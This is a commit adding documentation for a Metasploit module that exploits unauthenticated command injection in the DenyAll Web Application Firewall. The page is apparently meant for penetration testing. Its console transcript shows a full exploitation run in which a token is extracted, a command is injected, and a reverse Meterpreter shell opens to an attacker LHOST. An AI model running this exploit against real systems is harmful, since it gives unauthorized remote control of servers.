Adding DenyAll RCE module

documentation/modules/exploit/linux/http/denyall_waf_exec.md

@@ -0,0 +1,37 @@
+## Vulnerable Application
+
+This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.
+
+**Vulnerable Application Installation Steps**
+
+It's possible to have trial demo for 15 days at Amazon Marketplace.
+[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
+
+You just need to follow instruction above URL.
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+```
+msf > use exploit/linux/http/denyall_exec 
+msf exploit(denyall_exec) > 
+msf exploit(denyall_exec) > set RHOST 35.176.123.128
+RHOST => 35.176.123.128
+msf exploit(denyall_exec) > set LHOST 35.12.3.3
+LHOST => 35.12.3.3
+msf exploit(denyall_exec) > check
+[*] 35.176.123.128:3001 The target appears to be vulnerable.
+msf exploit(denyall_exec) > exploit 
+
+[*] Started reverse TCP handler on 35.12.3.3:4444 
+[*] Extracting iToken value from unauthenticated accessible endpoint.
+[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
+[*] Trigerring command injection vulnerability with  iToken value.
+[*] Sending stage (40411 bytes) to 35.176.123.128
+[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
+
+meterpreter > pwd
+/var/log/denyall/reverseproxy
+meterpreter >
+```